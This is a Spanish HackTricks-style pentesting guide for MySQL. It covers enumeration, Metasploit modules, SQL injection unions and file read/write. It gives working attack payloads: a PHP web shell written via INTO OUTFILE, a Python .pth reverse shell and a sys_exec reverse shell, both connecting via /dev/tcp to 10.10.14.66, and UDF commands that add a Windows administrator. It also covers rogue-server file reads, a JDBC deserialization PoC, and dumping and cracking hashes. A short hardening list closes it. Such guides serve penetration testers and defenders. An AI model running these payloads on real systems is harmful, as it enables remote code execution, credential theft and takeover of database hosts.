3306 - Pentesting Mysql

Reading time: 18 minutes

Información básica

MySQL puede describirse como un Sistema de Gestión de Bases de Datos Relacionales (RDBMS) de código abierto y disponible sin coste. Opera con el Lenguaje de Consulta Estructurado (SQL), lo que permite la gestión y manipulación de bases de datos.

Puerto por defecto: 3306

3306/tcp open  mysql

Conexión

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remoto

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Enumeración externa

Algunas de las acciones de enumeración requieren credenciales válidas

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Escribir cualquier dato binario

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Comandos de MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Enumeración de permisos de MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Puedes ver en la documentación el significado de cada privilegio: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (site-specific configuration hooks)

Abusando del clásico INTO OUTFILE primitive es posible obtener ejecución de código arbitrario en objetivos que más tarde ejecuten scripts Python.

1. Usa INTO OUTFILE para dejar un archivo personalizado .pth dentro de cualquier directorio cargado automáticamente por site.py (p. ej. .../lib/python3.10/site-packages/).
2. El archivo .pth puede contener una única línea que empiece con import seguida de código Python arbitrario que se ejecutará cada vez que el intérprete arranque.
3. Cuando el intérprete es ejecutado implícitamente por un CGI script (por ejemplo /cgi-bin/ml-draw.py con shebang #!/bin/python) el payload se ejecuta con los mismos privilegios que el proceso del servidor web (FortiWeb lo ejecutó como root → full pre-auth RCE).

Example .pth payload (single line, no spaces can be included in the final SQL payload, so hex/UNHEX() or string concatenation may be required):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Ejemplo de creación del archivo mediante una consulta UNION (los caracteres de espacio se reemplazan con /**/ para eludir un filtro de espacios sscanf("%128s") y mantener la longitud total ≤128 bytes):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Limitaciones importantes & bypasses:

• INTO OUTFILE no puede sobrescribir archivos existentes; elige un nombre de archivo nuevo.
• La ruta de archivo se resuelve relativa al CWD de MySQL, por lo que prefijar con ../../ ayuda a acortar la ruta y eludir las restricciones de ruta absoluta.
• Si la entrada del atacante se extrae con %128s (o similar) cualquier espacio truncará el payload; usa las secuencias de comentarios de MySQL /**/ o /*!*/ para reemplazar espacios.
• El usuario de MySQL que ejecuta la consulta necesita el privilegio FILE, pero en muchos appliances (p.ej. FortiWeb) el servicio se ejecuta como root, otorgando acceso de escritura casi en todas partes.

Después de colocar el .pth, simplemente solicita cualquier CGI manejado por el intérprete de python para obtener code execution:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

El proceso de Python importará automáticamente el .pth malicioso y ejecutará el shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL lectura arbitraria de archivos por el cliente

De hecho, cuando intentas load data local into a table el contenido de un archivo el servidor MySQL o MariaDB le pide al cliente que lo lea y envíe el contenido. Entonces, si puedes manipular un mysql client para que se conecte a tu propio servidor MySQL, puedes leer archivos arbitrarios.
Ten en cuenta que este es el comportamiento al usar:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Fíjate en la palabra "local")\ Porque sin "local" puedes obtener:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Inicial PoC: https://github.com/allyshka/Rogue-MySql-Server
En este artículo puedes ver una descripción completa del ataque e incluso cómo extenderlo a RCE: https://paper.seebug.org/1113/
Aquí puedes encontrar una visión general del ataque: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql User

Será muy interesante si mysql se ejecuta como root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Configuraciones peligrosas de mysqld.cnf

En la configuración de los servicios MySQL, se emplean varias opciones para definir su funcionamiento y medidas de seguridad:

• La opción user se utiliza para designar el usuario bajo el cual se ejecutará el servicio MySQL.
• password se utiliza para establecer la contraseña asociada con el usuario de MySQL.
• admin_address especifica la dirección IP que escucha conexiones TCP/IP en la interfaz de red administrativa.
• La variable debug indica las configuraciones de depuración actuales, incluyendo información sensible dentro de los logs.
• sql_warnings controla si se generan cadenas informativas para sentencias INSERT de una sola fila cuando aparecen warnings, conteniendo datos sensibles dentro de los logs.
• Con secure_file_priv, el alcance de las operaciones de importación y exportación de datos se restringe para mejorar la seguridad.

Escalada de privilegios

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Si el mysql server is running as root (o un usuario distinto con más privilegios) puedes hacer que ejecute comandos. Para ello, necesitas usar user defined functions. Y para crear una user defined function necesitarás una librería para el sistema operativo que ejecuta mysql.

La librería maliciosa para usar puede encontrarse dentro de sqlmap y dentro de metasploit ejecutando locate "*lib_mysqludf_sys*". Los archivos .so son librerías de linux y los .dll son los de Windows, elige la que necesites.

Si no tienes esas librerías, puedes bien buscarlas, o descargar este linux C code y compilarlo dentro de la máquina vulnerable linux:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Ahora que tienes la librería, login dentro de Mysql como un usuario privilegiado (root?) y sigue los siguientes pasos:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Consejo de Windows: crear directorios con NTFS ADS desde SQL

En NTFS puedes forzar la creación de directorios usando un alternate data stream incluso cuando solo existe una primitiva de escritura de archivos. Si la cadena clásica de UDF espera un directorio plugin pero no existe y @@plugin_dir es desconocido o está bloqueado, puedes crearlo primero con ::$INDEX_ALLOCATION:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Esto convierte el limitado SELECT ... INTO OUTFILE en una primitiva más completa en entornos Windows al crear la estructura de carpetas necesaria para UDF drops.

Extrayendo credenciales de MySQL desde archivos

Dentro de /etc/mysql/debian.cnf puedes encontrar la contraseña en texto plano del usuario debian-sys-maint

cat /etc/mysql/debian.cnf

Puedes usar estas credentials para login en la base de datos mysql.

Inside the file: /var/lib/mysql/mysql/user.MYD you can find todos los hashes de los usuarios MySQL (los que puedes extraer de mysql.user dentro de la base de datos).

Puedes extraerlos haciendo:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Habilitar el registro

Puedes habilitar el registro de las consultas de mysql en /etc/mysql/my.cnf descomentando las siguientes líneas:

Archivos útiles

Configuration Files

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Command History
• ~/.mysql.history
• Log Files
• connections.log
• update.log
• common.log

Bases de datos/tablas predeterminadas de MySQL

Comandos automáticos de HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

Aspectos destacados 2023-2025 (nuevo)

JDBC propertiesTransform deserialization (CVE-2023-21971)

Desde Connector/J <= 8.0.32, un atacante que pueda influir en la JDBC URL (por ejemplo, en software de terceros que solicita una cadena de conexión) puede solicitar que se carguen clases arbitrarias en el lado del cliente mediante el parámetro propertiesTransform. Si un gadget presente en el class-path es cargable, esto resulta en remote code execution en el contexto del JDBC client (pre-auth, porque no se requieren credenciales válidas). Un PoC mínimo se ve así:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Running Evil.class can be as easy as producing it on the class-path of the vulnerable application or letting a rogue MySQL server send a malicious serialized object. The issue was fixed in Connector/J 8.0.33 – upgrade the driver or explicitly set propertiesTransform on an allow-list. (Ver el write-up de Snyk para más detalles)

Ataques Rogue / Fake MySQL server contra clientes JDBC

Several open-source tools implement a partial MySQL protocol in order to attack JDBC clients that connect outwards:

• mysql-fake-server (Java, supports file read and deserialization exploits)
• rogue_mysql_server (Python, similar capabilities)

Rutas de ataque típicas:

1. La aplicación víctima carga mysql-connector-j con allowLoadLocalInfile=true o autoDeserialize=true.
2. El atacante controla DNS / host entry de modo que el hostname de la DB resuelva a una máquina bajo su control.
3. El servidor malicioso responde con paquetes elaborados que desencadenan ya sea una lectura arbitraria de archivos vía LOCAL INFILE o Java deserialization → RCE.

Ejemplo de one-liner para iniciar un fake server (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Luego dirige la aplicación víctima a jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true y lee /etc/passwd codificando el nombre de archivo en base64 en el campo username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 almacena los hashes de contraseña como $mysql-sha2$ (SHA-256). Tanto Hashcat (modo 21100) como John-the-Ripper (--format=mysql-sha2) soportan cracking offline desde 2023. Vuelca la columna authentication_string y pásala directamente:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Lista de hardening (2025)

• Set LOCAL_INFILE=0 y --secure-file-priv=/var/empty para eliminar la mayoría de las primitivas de lectura/escritura de archivos.
• Eliminar el privilegio FILE de las cuentas de aplicaciones.
• En Connector/J, configurar allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (vacío).
• Deshabilitar plugins de autenticación no usados y require TLS (require_secure_transport = ON).
• Vigilar CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL y declaraciones repentinas de SET GLOBAL.

Referencias

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)